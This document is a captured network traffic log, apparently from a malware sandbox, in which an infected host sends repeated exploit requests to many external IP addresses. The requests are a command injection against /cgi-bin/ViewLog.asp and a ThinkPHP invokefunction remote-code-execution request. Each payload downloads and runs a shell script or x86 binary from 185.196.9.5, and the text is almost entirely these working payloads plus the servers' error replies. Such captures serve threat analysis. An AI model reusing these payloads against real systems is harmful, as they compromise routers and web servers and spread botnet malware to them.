Feb 25, 2024 19:04:23.758714914 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
803	192.168.2.15	36204	31.136.99.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.941471100 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.517433882 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:25.637517929 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:27.877448082 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:32.485352039 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:41.445293903 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:00.901019096 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:37.764759064 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
804	192.168.2.15	37358	31.136.252.61	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.941943884 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.517433882 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:25.637517929 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:27.877448082 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:32.485352993 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:41.445260048 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:00.901019096 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:37.764758110 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
805	192.168.2.15	51644	85.230.112.223	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.975764036 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.194772959 CET	587	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:24 GMT Server: Apache/2.4.58 (Unix) Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 33 30 32 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 31 39 36 2e 39 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 302 Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (Unix) Server at 185.196.9.5 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
806	192.168.2.15	44022	94.120.1.23	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:23.981015921 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
807	192.168.2.15	37336	112.147.85.206	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:24.066323042 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:24.372340918 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:24 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
808	192.168.2.15	44518	112.81.84.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:24.082648039 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:24.405653954 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sun, 25 Feb 2024 18:04:24 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
809	192.168.2.15	42908	112.50.96.26	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:24.128165007 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:24.497013092 CET	315	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:04:24 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
810	192.168.2.15	42910	112.50.96.26	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:24.134356976 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:24.509532928 CET	315	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:04:24 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
811	192.168.2.15	59974	112.125.25.95	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:24.371941090 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:24.677567005 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:24 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
812	192.168.2.15	49680	95.101.197.170	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:25.889816046 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:26.100761890 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:26 GMT Date: Sun, 25 Feb 2024 18:04:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 39 37 37 31 33 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 36 36 26 23 34 36 3b 64 37 34 62 33 34 34 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.19771302.1708884266.d74b344b</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
813	192.168.2.15	46962	95.66.153.244	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:25.909485102 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:26.209356070 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
